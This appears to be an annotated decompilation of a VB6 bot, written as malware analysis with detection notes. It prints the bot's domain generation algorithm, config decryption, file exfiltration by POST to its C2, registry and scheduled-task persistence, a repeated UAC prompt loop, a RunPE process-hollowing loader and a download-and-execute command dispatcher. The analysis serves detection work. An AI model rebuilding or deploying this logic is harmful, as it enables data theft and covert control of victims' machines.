'Probe candidates in order; the first that answers "OK" wins.
loc_4064C5: For var_E4 = 0 To UBound(var_8C, 1): var_90 = var_E4 'Long
loc_4064D9: domain = Trim$(var_8C(var_90))
loc_4064F3: If ((domain <> 0) And (Len(domain) > &HA)) Then
loc_4064F8: test_connection_microsoft(0)
loc_40651C: If (process_data(domain, 0) = "OK") Then
loc_406524: MY_DOMAIN = domain
loc_40652B: cnc_post_and_read(0)
loc_406532: Exit For
loc_406535: End If
loc_406537: End If
loc_40653E: Next var_E4 'Long
loc_406543: ' Referenced from: 406532
loc_406551: If (MY_DOMAIN = 0) Then
loc_406556: End
loc_406558: End If
loc_40655A: Exit Sub
End Sub
Public Sub test_connection_microsoft
'Purpose: blocks until internet connectivity is available: retries UnknownFunc on
'"http://www.microsoft.com" every 10 s (&H2710 ms) until it returns non-zero. The
'called API is not shown (an InternetCheckConnection-style probe would fit - confirm).
'The loop is built from a label and GoTo, as the decompiler emitted it.
'Data Table: 401634
loc_403F4C: On Error Resume Next
loc_403F4F: ' Referenced from: 403F8F
loc_403F7E: If (UnknownFunc("http://www.microsoft.com") = 0) Then
loc_403F88: Sleep(&H2710)
loc_403F8F: GoTo loc_403F4F
loc_403F92: End If
loc_403F94: Exit Sub
End Sub
Public Sub domain_generate(arg_C) '407084
'Raw decompiler output of the DGA; see the cleaned copy near the top of this file for a
'line-by-line explanation. Mapping: var_C0 = baseStr (alphabet), var_90/var_94/var_98 =
'day/month/year, domain_ext = ext. Inputs are the config fields Me(92), Me(124),
'Me(120) (seed date), Me(116) (period), Me(108) (length) and Me(148) (TLD list).
'Parameter: arg_C - day offset within the current period.
'Result:    `domain_name` = "http://" & <name>.<tld> & "/gate.php".
'Data Table: 401634
Dim var_BC As Double
Dim var_AC As Long
Dim var_A8 As Double
Dim var_90 As Single
Dim var_94 As Single
Dim var_98 As Single
Dim arg_2008 As Variant
Dim var_9C As Long
loc_406E18: On Error Resume Next
loc_406E28: var_C0 = Me(92) & Me(124)
loc_406E3F: var_BC = CDate(DateValue(Me(120)))
loc_406E6E: var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC)))
loc_406E86: If (var_AC < 0) Then
loc_406E8B: Exit Sub
'Unreachable after Exit Sub.
loc_406E8E: End
loc_406E90: End If
'Base date = seed + elapsed days rounded down to a multiple of Me(116).
loc_406EAD: var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116))))))
loc_406ECC: var_90 = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C))))))
loc_406EF2: var_94 = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C))))))
loc_406F18: var_98 = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C))))))
'Mod binds tighter than Xor: index = month Xor (day Mod UBound).
loc_406F49: arg_2008 = Split(Me(148), "|", -1, 0)
loc_406F74: domain_ext = arg_2008((CLng(var_94) Xor CLng(var_90) Mod UBound(arg_2008, 1)))
loc_406FB6: var_9C = (((CLng(var_98) And &HFF00) / &H100) * CLng((var_90 * Tan(CDbl((CLng(var_98) And &HFF))))) Xor CLng(Cos((var_94 * CDbl(&HA)))))
loc_406FBF: var_9C = Abs(var_9C)
loc_406FCF: If CBool((var_9C Mod 2)) Then
loc_406FE6: var_9C = var_9C Xor (CLng(var_98) / CLng((var_94 * var_90)))
loc_406FE9: End If
loc_406FF8: For var_11C = 1 To Me(108): var_C4 = var_11C 'Long
loc_407039: domain_name = domain_name & Mid$(var_C0, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(var_C0)) - Len(var_C0))), 1)
loc_407047: Next var_11C 'Long
loc_407072: domain_name = "http://" & LCase$(domain_name & "." & domain_ext) & "/gate.php"
loc_407082: Exit Sub
End Sub
Public Sub get_attribute1(arg_C) '403BB4
'Purpose: path existence probe - returns CBool(GetAttr(arg_C)). GetAttr raises an error for
'a missing path, which On Error Resume Next swallows, so the result is presumably False
'then; callers throughout this file treat the result as "file is present".
'Parameter: arg_C - file or directory path.
'Returns:   Boolean (the decompiler renders the return as `Result ... End Sub`).
'Caveat: GetAttr yields 0 (vbNormal) for an existing file with no attribute bits set, so
'such a file would also read as False - verify against the binary if it matters.
'Data Table: 401634
loc_403B9C: On Error Resume Next
loc_403BB0: Result CBool(GetAttr(arg_C)) End Sub 'Integer
End Sub
Public Sub Proc_0_14_403F14
'Purpose: directory deletion helper used by Proc_0_7. Late-binds an object (the
'DeleteFolder method name suggests a FileSystemObject - confirm) and, when arg_10 is
'true, calls DeleteFolder and returns True; otherwise returns the default False.
'Parameters: the folder path and arg_10 are not shown in the signature (decompiler output);
'            Proc_0_7 passes a path and, for the second call, &HFF.
'Returns:    var_B8 (Boolean) via the decompiler's `Result ... End Sub` form.
'Data Table: 401634
Dim var_86 As Integer
Dim var_B8 As Boolean
loc_403ED0: On Error Resume Next
loc_403EE1: LateMemCallLdVar
loc_403EEB: var_86 = CBool(MemVar_402104)
loc_403EF6: If arg_10 Then
loc_403F02: var_B8 = True
loc_403F0B: Call MemVar_402104.DeleteFolder
loc_403F11: End If
loc_403F13: Result var_B8 End Sub 'Integer
End Sub
Public Sub kill_task(arg_C) '403D28
'Purpose: force-terminates a process by image name via "taskkill /IM <name> /F".
'Parameter: arg_C - image name; lower-cased before use (taskkill matches case-insensitively).
'Detection note: a "taskkill /IM ... /F" child of an unsigned VB6 process is a simple
'process-tree indicator for this family.
'Data Table: 401634
On Error Resume Next
shell_execute("taskkill /IM " & LCase$(arg_C) & " /F ")
Exit Sub
End Sub
Public Sub decrypt(str1_arg, str2_arg) '406ABC
'Raw decompiler output of the config/parameter decryption routine; the cleaned copy at
'the top of this file documents it step by step. Mapping: var_A0 = key table (286
'entries), var_AC = UBound(key bytes), var_B6 = pass toggle, var_B0 = key index,
'var_B4 = table index.
'Parameters: str1_arg - ciphertext string; str2_arg - key string.
'Result:     `result` - plaintext string.
'Data Table: 401634
Dim var_AC As Long
Dim var_B6 As Integer
Dim var_B0 As Long
Dim var_B4 As Long
loc_406870: On Error Resume Next
'&H80 = vbFromUnicode.
loc_40689C: str1 = StrConv(str1_arg, &H80, 0)
loc_4068CA: str2 = StrConv(str2_arg, &H80, 0)
loc_4068D8: var_AC = UBound(str2, 1)
'Identity for 0..255, then 0..29 in entries 256..285.
loc_4068EA: For index1 = 0 To &HFF: _indx = index1 'Long
loc_4068FC: var_A0(_indx ) = CInt(_indx )
loc_406902: Next index1 'Long
loc_406916: For var_F4 = &H100 To &H11D: _indx = var_F4 'Long
loc_40692F: var_A0(_indx ) = CInt(_indx Xor &H100)
loc_406935: Next var_F4 'Long
'Entries 250..255 and 0..5 are derived from the first/last six key bytes.
loc_406949: For var_FC = 1 To 6: _indx = var_FC 'Long
loc_40696B: var_A0((_indx + &HF9)) = CInt(str2((var_AC - _indx )))
loc_40699E: var_A0((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((var_AC - _indx ))))
loc_4069A4: Next var_FC 'Long
loc_4069AD: var_B6 = 0
loc_4069C1: var_B4 = 0
loc_4069D5: For var_104 = 0 To UBound(str1, 1): _indx = var_104 'Long
'Never true for a non-empty key; presumably a garbled `var_B0 > var_AC`.
loc_4069E4: If (0 > var_AC) Then
loc_4069EE: var_B0 = 0
loc_4069F1: End If
loc_406A03: If ((var_B4 > &H11D) And (var_B6 = 0)) Then
loc_406A0D: var_B4 = 0
loc_406A16: var_B6 = Not(var_B6)
loc_406A19: End If
loc_406A2B: If ((var_B4 > &H11D) And (var_B6 = &HFF)) Then
loc_406A35: var_B4 = 5
loc_406A3E: var_B6 = Not(var_B6)
loc_406A41: End If
loc_406A6A: str1(_indx) = CByte(CInt(str1(_indx)) Xor var_A0(var_B4) Xor CInt(str2(var_B0)))
loc_406A77: var_B0 = (var_B0 + 1)
loc_406A85: var_B4 = (var_B4 + 1)
loc_406A8D: Next var_104 'Long
'&H40 = vbUnicode.
loc_406AB2: result = CStr(StrConv(str1, &H40, 0))
loc_406ABA: Exit Sub
End Sub
Public Sub base64_decode(arg_C) '404AA8
'Purpose: base64 decoding through a COM object created from get_object_type(4). The
'DataType = "bin.base64" / nodeTypedValue usage is the MSXML DOM element idiom, so
'get_object_type(4) presumably resolves to an MSXML ProgID - confirm. Used in main to
'decode config param 3 into Me(92).
'Parameter: arg_C - base64 text.
'Result:    var_88 (used without a Dim) - decoded bytes converted with &H40 = vbUnicode.
'Data Table: 401634
Dim var_B8 As Variant
loc_4049E8: On Error Resume Next
loc_404A0D: CAdVar
loc_404A1B: var_B8 = "b64"
loc_404A24: LateMemCallLdVar
loc_404A2C: CAdVar
loc_404A3A: Set var_CC = CreateObject(get_object_type(4), 0)
loc_404A49: var_CC.DataType = "bin.base64"
loc_404A59: var_CC.Text = CVar(arg_C)
loc_404A82: var_88 = CStr(StrConv(var_CC.nodeTypedValue, &H40, 0))
loc_404A90: Set var_CC = Nothing
loc_404A98: Set var_90 = Nothing
loc_404AA0: Set var_8C = Nothing
loc_404AA6: Exit Sub
End Sub
Public Sub Proc_0_18_405D30(arg_C) '405D30
'Purpose: string obfuscation encoder. Picks a random key byte var_9C in 1..99, derives a
'second term var_98 from the characters of Me(124) (chained Cos/Sqr), then emits arg_C
'reversed with each character XORed by (var_9C + Int(var_98)), prefixed with Chr$(var_9C)
'so the receiver can recover the key. The final loop hex-encodes the result.
'Parameter: arg_C - plaintext to encode.
'Result:    var_88 (used without a Dim) - presumably the hex string.
'Decompiler output: the Hex$ value is never assigned to var_90 in the last loop (only the
'"0" zero-padding survives), so an assignment was evidently lost; var_8C, var_90 are undeclared.
'Note the key is random per call, so encoded output differs between runs.
'Data Table: 401634
Dim var_9C As Long
Dim rnd As Integer
Dim var_98 As Double
loc_405BBC: On Error Resume Next
'Rnd * 99 + 1 -> 1..99.
loc_405BC4: Randomize(rnd)
loc_405BE1: var_9C = CLng(Int(((Rnd(rnd) * CDbl(&H63)) + CDbl(1))))
loc_405BF7: For var_C8 = 1 To Len(Me(124)): var_A0 = var_C8 'Long
loc_405C30: var_98 = (CDbl(Asc(Mid$(Me(124), var_A0, 1))) * Abs(Cos(Sqr(var_98))))
loc_405C3E: Next var_C8 'Long
'Prepending each XORed char reverses the string.
loc_405C51: For var_DC = 1 To Len(arg_C): var_A0 = var_DC 'Long
loc_405C8B: var_8C = Chr$(CLng(Asc(Mid$(arg_C, var_A0, 1))) Xor CLng((CDbl(var_9C) + Int(var_98)))) & var_8C
loc_405C9D: Next var_DC 'Long
loc_405CB3: var_8C = Chr$(var_9C) & var_8C
loc_405CC7: For var_E8 = 1 To Len(var_8C): var_A0 = var_E8 'Long
loc_405D08: If (Len(Hex$(CVar(Asc(Mid$(var_8C, var_A0, 1))))) = 1) Then
loc_405D14: var_90 = "0" & var_90
loc_405D17: End If
loc_405D20: var_88 = var_88 & var_90
loc_405D28: Next var_E8 'Long
loc_405D2F: Exit Sub
End Sub
Public Sub Proc_0_19_404CD8(arg_C) '404CD8
'Purpose: derives the config decryption key from the encrypted blob (used in main as
'decrypt(var_88, Proc_0_19_404CD8(var_88))). The key depends only on Len(arg_C):
'Cos(Sqr(Len)) rounded to 15 (&HF) places, take the digits after the decimal point, and
'concatenate the ASCII code of each digit. Because no secret enters this derivation,
'the key is fully recoverable from the blob, which is what makes offline config
'extraction straightforward.
'Parameter: arg_C - encrypted config string (only its length is used).
'Result:    var_88 (used without a Dim) - the key string.
'Data Table: 401634
loc_404C78: var_8C = CStr(Split(Str$(Round(CVar(Cos(Sqr(CDbl(Len(arg_C))))), &HF)), ".", -1, 0)(1))
loc_404C9B: For var_13C = 1 To Len(var_8C): var_94 = var_13C 'Long
loc_404CC2: var_88 = var_88 & CStr(Asc(Mid$(var_8C, var_94, 1)))
loc_404CD2: Next var_13C 'Long
loc_404CD7: Exit Sub
End Sub
Public Sub Proc_0_20_4054D4
'Purpose: elevation nag loop. Counts running instances of its own image via WMI
'(Proc_0_21), launches `cmd.exe /c "<own path>"` through ShellExecute with the "RunAs"
'verb (which triggers the UAC consent prompt), waits while consent.exe is running, and
'then recurses if the instance count did not grow - i.e. the prompt is repeated until the
'user accepts; on success the unelevated instance ends. Gated by config param &HF in main.
'Detection note: repeated consent.exe launches originating from the same unelevated
'parent, and cmd.exe spawned with the RunAs verb, are the observable pattern.
'Decompiler output: var_90 and var_88 are used without a Dim; the ShellExecute arguments
'were collapsed into the preceding var_AC..var_12C assignments.
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_8A As Integer
Dim var_AC As Variant
Dim var_CC As Variant
Dim var_EC As Variant
Dim var_10C As String
Dim var_12C As Integer
loc_4053A0: On Error Resume Next
loc_4053B1: var_90 = MemVar_40B3A4.App
loc_4053CE: var_8A = Proc_0_21_404594(App.EXEName & ".exe")
loc_4053FD: CAdVar
loc_405414: var_AC = CVar(SYSTEM32_DIR & "cmd.exe") 'String
loc_40542F: var_CC = CVar("/c " & """" & Me(88) & """") 'String
loc_405438: var_EC = CVar(0) 'String
loc_40543C: var_10C = "RunAs"
loc_405442: var_12C = 0
loc_40544B: Call CreateObject(get_object_type(3, 0), var_8A).ShellExecute
loc_405463: Set var_88 = Nothing
'Busy-wait (label + GoTo) while the UAC consent dialog process exists.
loc_405467: ' Referenced from: 405482
loc_40547F: If (Proc_0_21_404594("consent" & ".exe", var_12C, var_10C) > 0) Then
loc_405482: GoTo loc_405467
loc_405485: End If
loc_405493: var_90 = MemVar_40B3A4.App
loc_4054BE: If (Proc_0_21_404594(App.EXEName & ".exe", var_EC) <= var_8A) Then
loc_4054C3: Proc_0_20_4054D4(var_CC)
loc_4054CB: Else
loc_4054CD: End
loc_4054CF: End If
loc_4054D1: Exit Sub
End Sub
Public Sub Proc_0_21_404594(arg_C) '404594
'Purpose: returns how many processes with image name arg_C are running, via a WMI query
'"select * from win32_Process where Name='<arg_C>'" executed through GetObject("winmgmts:")
'(the ExecQuery call is collapsed by the decompiler; only .Count survives).
'The query string is assembled from fragments, which hinders naive string matching on
'the binary - a WMI Win32_Process query from a VB6 process is itself an indicator.
'Parameter: arg_C - process image name, e.g. "consent.exe".
'Returns:   Integer count via the decompiler's `Result ... End Sub` form.
'Data Table: 401634
Dim var_104 As Variant
loc_40453D: var_104 = CVar("select * from " & "win32_" & "Process" & " where " & "Name" & "='" & arg_C & "'") 'String
loc_40455A: VarLateMemCallLdVar
loc_404562: CAdVar
loc_404593: Result CInt(GetObject("winmgmts:", var_E4).Count) End Sub 'Integer
End Sub
Public Sub load_param(index, is_encrypted) '4067E8
'Purpose: reads configuration parameter number `index` from the decrypted PARAMS_STORAGE.
'Parameters are stored between two-character tags; the 41 (&H29) tag names are not fixed
'but generated from Len(PARAMS_STORAGE) - 60 (&H3C), so they differ per build and a
'config extractor must recompute them the same way.
'Parameters: index        - 0-based parameter number (into the generated tag list);
'            is_encrypted - when true the value is additionally run through decrypt with
'                           key Me(92).
'Result:     var_88 (used without a Dim): "255" (&HFF, the decompiler's True) when the
'            stored value is "1", "0" when the tag is absent. The branch that assigns the
'            raw substring for any other value was evidently lost in decompilation -
'            callers such as base64_decode(load_param(3, 0)) rely on it.
'Decompiler output: var_A0, var_A8, var_AC, var_BC, var_C4 are used without a Dim.
'Data Table: 401634
Dim var_B0 As Integer
Dim var_AE As Integer
Dim arg_2008 As Variant
Dim var_B4 As Long
Dim var_B8 As Long
loc_4065B0: On Error Resume Next
loc_4065C2: var_B0 = CInt((Len(PARAMS_STORAGE) - &H3C))
'Label + GoTo loop: fold var_B0 into the bounds of var_A0.
loc_4065C5: ' Referenced from: 4065F8
loc_4065DA: If ((LBound(var_A0, 1) + CLng(var_B0)) > UBound(var_A0, 1)) Then
loc_4065F3: var_B0 = CInt(((LBound(var_A0, 1) + CLng(var_B0)) - UBound(var_A0, 1)))
loc_4065F8: GoTo loc_4065C5
loc_4065FB: End If
'Build 41 comma-separated tags: first char Chr$(LBound + var_B0) (wrapped to 1 past 'z',
'&H7A), second char 'a' (&H61) + var_AE stepping by 2 and wrapping at '{' (&H7B).
loc_40660A: For var_C4 = 1 To &H29: var_BC = var_C4 'Long
loc_40661B: If ((&H61 + var_AE) >= &H7B) Then
loc_406622: var_AE = 0
loc_40662D: var_B0 = (var_B0 + 1)
loc_406630: End If
loc_406643: If ((LBound(var_A0, 1) + CLng(var_B0)) > &H7A) Then
loc_40664A: var_B0 = 1
loc_40664D: End If
loc_406679: var_A8 = var_A8 & Chr$((LBound(var_A0, 1) + CLng(var_B0))) & Chr$(CLng((&H61 + var_AE)))
loc_40668D: var_AE = (var_AE + 2)
loc_40669B: If (var_BC < &H29) Then
loc_4066B1: var_A8 = var_A8 & Chr$(&H2C)
loc_4066B7: End If
loc_4066BC: Next var_C4 'Long
loc_4066EE: arg_2008 = Split(var_A8, CVar(Chr$(&H2C)), -1, 0)
loc_4066F8: var_AC = arg_2008
'Locate "<tag>" ... "<tag" in the storage: var_B4 = start of the value (tag length 2 plus
'the '>' = 3), var_B8 = position of the closing "<tag".
loc_406736: var_B4 = (InStr(1, PARAMS_STORAGE, var_AC(CLng(index)) & Chr$(&H3E), 0) + 3)
loc_40676A: var_B8 = InStr(var_B4, PARAMS_STORAGE, Chr$(&H3C) & var_AC(CLng(index)), 0)
loc_40677F: If (var_B8 <> 0) Then
loc_4067AC: If (Mid$(PARAMS_STORAGE, var_B4, CVar((var_B8 - var_B4))) = "1") Then
loc_4067B5: var_88 = CStr(&HFF)
loc_4067B8: End If
loc_4067BD: If is_encrypted Then
loc_4067CF: var_88 = decrypt(var_88, Me(92))
loc_4067D2: End If
loc_4067D5: Else
loc_4067DD: var_88 = CStr(0)
loc_4067E0: End If
loc_4067E4: Exit Sub
End Sub
Public Sub post_content(file, filename, type) '407344
'Purpose: exfiltrates a file to the C2 as a multipart/form-data POST. The request goes to
'MY_DOMAIN & "?" & Left$(Me(124), 3) & "=1"; the form field name is the same 3-char prefix,
'the part carries "Content-Type: file", and the boundary comes from make_random_string.
'The HTTP object is called through a COM interface ({016FE2EC-...}); the three calls take
'("POST", url), ("Content-Type", ...) and (body), i.e. open / set-header / send style
'operations - the concrete component is not named in this listing.
'Parameters: file     - local path; only sent when it is larger than 10 (&HA) bytes and exists;
'            filename - name reported in Content-Disposition;
'            type     - when true the content is converted with &H80 (vbFromUnicode) and
'                       truncated via Mid$(..., 2, var_E0) (var_E0 undeclared here).
'Returns:    &HFF (True) via the decompiler's `Result ... End Sub` form.
'Detection note: POST bodies with a "Content-Type: file" part and a 3-letter form field
'to a "?xxx=1" URL are a usable network signature.
'Data Table: 401634
Dim var_AC As Variant
Dim var_104 As String
Dim var_D0 As Variant
loc_407103: If ((FileLen(file) > &HA) And get_attribute1(file)) Then
loc_407108: On Error Resume Next
loc_407111: Set var_98 = New
loc_40711B: boundary_id = make_random_string()
loc_407123: If type Then
loc_40715F: var_90 = Mid$(CStr(StrConv(CVar(file_binary_open(file)), &H80, 0)), 2, var_E0)
loc_407175: Else
loc_40717F: var_90 = file_binary_open(file)
loc_407182: End If
loc_4071D2: var_104 = "--" & boundary_id & vbCrLf & "Content-Disposition: form-data; Name=""" & Left$(Me(124), 3) & """; filename="""
loc_40726D: var_AC = StrConv(var_104 & filename & """" & vbCrLf & "Content-Type" & ": file" & vbCrLf & vbCrLf & var_90 & vbCrLf & "--" & boundary_id & "--", &H80, 0)
loc_407289: Set var_138 = var_98
loc_4072A1: var_D0 = False
loc_4072D0: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_24 ("POST", MY_DOMAIN & "?" & Left$(Me(124), 3) & "=1")
loc_407304: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_28 ("Content-Type", "multipart/" & "form-data" & "; boundary=" & boundary_id)
loc_407320: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_34 (var_AC)
loc_407329: Set var_138 = Nothing
loc_407334: Set var_98 = Nothing
loc_407337: End If
loc_407342: Result &HFF End Sub 'Integer
End Sub
Public Sub make_persistent(add_schtask) '405B68
'Purpose: installs persistence according to the config flags: optional self-copy to
'Me(40) & MY_APPNAME & ".exe" (Me(156)), then REG_SZ entries named MY_APPNAME under HKCU
'Run (Me(152)), RunOnce (Me(154)) and Policies\Explorer\Run (Me(158)) via
'WScript.Shell.RegWrite, and a logon-triggered scheduled task via schtasks (Me(160)).
'Parameter: add_schtask - despite its name, the schtasks branch runs only when this is
'           NOT &HFF (True): main passes 0 (task created), Proc_0_1 passes &HFF
'           (registry entries only, re-applied every 30 loop passes).
'The value data for RegWrite and the Run call are collapsed by the decompiler. All
'three registry locations plus a "schtasks /create /sc ONLOGON" child process are
'standard persistence telemetry points.
'Decompiler output: var_90 is used without a Dim.
'Data Table: 401634
Dim var_A0 As Variant
Dim var_D0 As String
Dim var_C0 As Integer
Dim var_E0 As Boolean
loc_405A08: On Error Resume Next
loc_405A12: If Me(156) Then
loc_405A31: FileCopy Me(88), Me(40) & MY_APPNAME & ".exe"
loc_405A3D: End If
loc_405A44: Set var_90 = WSCRIPT_OBJ
loc_405A4F: If Me(152) Then
loc_405A5D: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String
loc_405A6A: var_D0 = "REG_SZ"
loc_405A73: Call var_90.RegWrite
loc_405A7C: End If
loc_405A83: If Me(154) Then
loc_405A91: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String
loc_405A9E: var_D0 = "REG_SZ"
loc_405AA7: Call var_90.RegWrite
loc_405AB0: End If
loc_405AB7: If Me(158) Then
loc_405AC5: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String
loc_405AD2: var_D0 = "REG_SZ"
loc_405ADB: Call var_90.RegWrite
loc_405AE4: End If
'Scheduled task: name MY_APPNAME & ".exe", runs Me(88) (own path) at every logon.
loc_405AEC: If (add_schtask <> &HFF) Then
loc_405AF6: If Me(160) Then
loc_405B30: var_A0 = CVar("schtasks /" & "create /sc ONLOGON /tn " & MY_APPNAME & ".exe" & " /tr " & """" & Me(88) & """") 'String
loc_405B34: var_C0 = 0
loc_405B3A: var_E0 = False
loc_405B42: Call var_90.Run
loc_405B5A: End If
loc_405B5A: End If
loc_405B5E: Set var_90 = Nothing
loc_405B64: Exit Sub
End Sub
Public Sub Proc_0_25_4082A0(arg_C, arg_10, arg_14) '4082A0
'Purpose: in-memory loader for a PE image supplied in arg_C; reached from
'parse_and_execute_commands for command 1 with the downloaded payload. The visible
'structure - MZ (&H5A4D) and PE (&H4550) signature checks, e_lfanew at +&H3C, ImageBase
'at +&H34, SizeOfHeaders at +&H54, NumberOfSections at +6, the &H28-byte section table at
'+&HF8 (VirtualAddress +&HC, SizeOfRawData +&H10, PointerToRawData +&H14),
'AddressOfEntryPoint at +&H28, a &H44-byte STARTUPINFO-sized struct, allocation flags
'&H3000 (MEM_COMMIT|MEM_RESERVE) and &H40 (PAGE_EXECUTE_READWRITE), and a CONTEXT with
'ContextFlags &H10007 (CONTEXT_FULL on x86) - matches the well-known "RunPE" process
'hollowing technique. The API calls themselves are hidden behind UnknownFunc(var_CC(n)),
'so confirm against the import table / dynamic API resolution.
'Parameters: arg_C  - PE image as a string (converted with &H80 = vbFromUnicode);
'            arg_10 - "1" selects the IStStrCopy path (purpose not visible here);
'            arg_14 - optional command line, prefixed with a space when non-empty.
'Returns:    the pointer value when a signature check fails, &HFF (True) on completion
'            (decompiler `Result ... End Sub` forms).
'Detection note: an unsigned VB6 process creating a child process and then writing to
'its memory and setting its thread context is the behavioural signature of this routine.
'Decompiler output: var_F0, var_B0, var_CC, var_E8, var_F4 are used without a Dim.
'Data Table: 401634
Dim var_124 As Long
Dim var_8C As Long
Dim var_90 As Long
Dim var_98 As Long
Dim var_128 As Long
Dim var_12C As Long
Dim var_94 As Long
loc_407F73: var_F0 = StrConv(arg_C, &H80, 0)
loc_407F80: If (arg_10 = "1") Then
loc_407F88: IStStrCopy
loc_407F8C: End If
loc_407F96: If (Len(arg_14) > 0) Then
loc_407FAA: arg_14 = ChrW$(&H20) & arg_14
loc_407FB1: End If
'DOS header check ("MZ"); Proc_0_26 reads `size` bytes at an address.
loc_407FC2: var_124 = VarPtr(var_F0(0))
loc_407FCB: var_8C = var_124
loc_407FE1: If (Proc_0_26_403C5C(var_8C, 2, var_8C) <> &H5A4D) Then
loc_407FE4: Result var_124 End Sub 'Integer
loc_407FE5: End If
'NT headers via e_lfanew; check "PE".
loc_407FFC: var_90 = (var_8C + Proc_0_26_403C5C((var_8C + &H3C), 4))
loc_408012: If (Proc_0_26_403C5C(var_90, 4) <> &H4550) Then
loc_408015: Result var_90 End Sub 'Integer
loc_408016: End If
loc_408029: var_98 = Proc_0_26_403C5C((var_90 + &H34), 4)
'var_B0(0) = &H44 is the cb field of a STARTUPINFO-sized structure.
loc_408039: var_B0(0) = &H44
loc_40804D: var_128 = VarPtr(arg_14)
loc_40805E: var_12C = VarPtr(var_B0(0))
loc_408096: UnknownFunc(VarPtr(arg_10))
loc_4080A7: UnknownFunc(var_CC(0))
loc_4080D2: var_12C = VarPtr(Proc_0_26_403C5C((var_90 + &H50), 4, VarPtr(var_98), var_98, VarPtr(var_98), 0, 0, 0))
loc_4080F3: UnknownFunc(var_CC(0))
loc_408109: var_124 = VarPtr(var_F0(0))
loc_408122: var_128 = Proc_0_26_403C5C((var_90 + &H54), 4, var_124, var_128, 0, var_12C, &H3000, &H40)
loc_40813C: UnknownFunc(var_CC(0))
'Per-section copy loop driven by NumberOfSections (+6) over the section table (+&HF8).
loc_408162: For var_134 = var_12C To (Proc_0_26_403C5C((var_90 + 6), 2, var_F4, 0, var_98, var_124, var_128, 0) - 1): var_128 = var_134 'Long
loc_40817B: var_94 = ((var_90 + &HF8) + (&H28 * var_F4))
loc_4081BD: var_12C = Proc_0_26_403C5C((var_94 + &H10), 4, Proc_0_26_403C5C((var_94 + &H14), 4, Proc_0_26_403C5C((var_94 + &HC), 4, var_94, var_12C, 4), 0))
loc_4081DF: UnknownFunc(var_CC(0))
loc_4081E7: Next var_134 'Long
'Thread context: flags &H10007, entry point = ImageBase-relative AddressOfEntryPoint (+&H28).
loc_4081F9: var_E8(0) = &H10007
loc_408211: UnknownFunc(var_CC(1))
loc_408246: UnknownFunc(var_CC(0))
loc_40826A: var_E8(&H2C) = (4 + Proc_0_26_403C5C((var_90 + &H28), 4, var_98, (var_E8(&H29) + 8), VarPtr(var_98)))
loc_408282: UnknownFunc(var_CC(1))
loc_408295: UnknownFunc(var_CC(1))
loc_40829F: Result &HFF End Sub 'Integer
End Sub
Public Sub Proc_0_26_403C5C
'Purpose: raw memory read helper used by Proc_0_25 as Proc_0_26_403C5C(address, size):
'it takes the address of the local var_88 and calls UnknownFunc(-1), presumably a
'memory-copy API that fills var_88 from the requested address (the call sites compare its
'result against "MZ"/"PE" and use it as DWORD/WORD fields). The arguments and the return
'are not visible in this rendering - confirm against the binary.
'Data Table: 401634
Dim var_8C As Long
loc_403C40: var_8C = VarPtr(var_88)
loc_403C56: UnknownFunc(-1)
loc_403C5B: Exit Sub
End Sub
' C2 command dispatcher. params_str is a "|"-separated record: field 0 is the
' numeric command id, field 1 the command argument (var_8C). var_90 is a
' "|<domain>|<Me(128)>|" prefix prepended to several reports. The whole handler
' runs under On Error Resume Next, so a failing step is skipped silently and
' execution continues. An unknown id falls through to Exit Sub.
' The nested If/Else chain is the decompiler's rendering of a dispatch on
' command_id; each branch is annotated inline (ids 0..25).
Public Sub parse_and_execute_commands(params_str) '409670
'Data Table: 401634
Dim var_D0 As Integer
Dim var_A0 As Variant
Dim var_FC As String
Dim var_B0 As Variant
Dim var_128 As Boolean
loc_408F30: On Error Resume Next
' var_8C = command argument (second "|" field, trimmed).
loc_408F6D: var_8C = Trim$(CStr(Split(params_str, "|", -1, 0)(1)))
loc_408F9E: var_90 = "|" & MY_DOMAIN & "|" & Me(128) & "|"
loc_408FAC: test_connection_microsoft()
' command_id = first "|" field.
loc_408FE2: command_id = Split(params_str, "|", -1, 0)(0) 'Variant
' 0: collect and send the host fingerprint (arg, if any, becomes the payload).
loc_408FFA: If (command_id = 0) Then
loc_409002: fingerprint_system(var_8C)
loc_40900A: Else
' 1: fetch/process the argument and hand it to Proc_0_25_4082A0 with "1".
loc_409017: If (command_id = 1) Then
loc_409036: var_FC = 0
loc_40904C: Proc_0_25_4082A0(process_data(var_8C, 0), "1")
loc_40905F: Else
' 2: drop a file as %TEMP%\<random>.<last 3 chars of arg> and execute it.
'    The leading "0 &" is most likely a decompiler artifact -- confirm.
loc_40906C: If (command_id = 2) Then
loc_409093: module_path = 0 & make_random_string(TEMP_DIR, Right$(var_8C, 3)) & Right$(var_8C, 3)
loc_4090B1: If process_and_write_to_file(var_8C, module_path) Then
loc_4090B9: shell_execute(module_path)
loc_4090BE: End If
loc_4090C1: Else
' 3: drop %TEMP%\<random>.vbs|.exe and pass it to modify_bot_install with
'    arg_14 = &HFF (that routine's "rd /q /s <MY_DIR>" + "start <file>" path),
'    i.e. replace the current installation with the downloaded module.
loc_4090CE: If (command_id = 3) Then
loc_4090E1: module_path = 0 & make_random_string(TEMP_DIR)
loc_40910D: If (LCase$(Right$(var_8C, 4)) = ".vbs") Then
loc_409119: module_path = module_path & ".vbs"
loc_40911F: Else
loc_40912A: module_path = module_path & ".exe"
loc_40912D: End If
loc_409141: If process_and_write_to_file(var_8C, module_path) Then
loc_409158: modify_bot_install(module_path, 0, &HFF)
loc_40915D: End If
loc_409162: Else
' 4: run "Explorer <arg>" through the hidden Shell wrapper.
loc_40916F: If (command_id = 4) Then
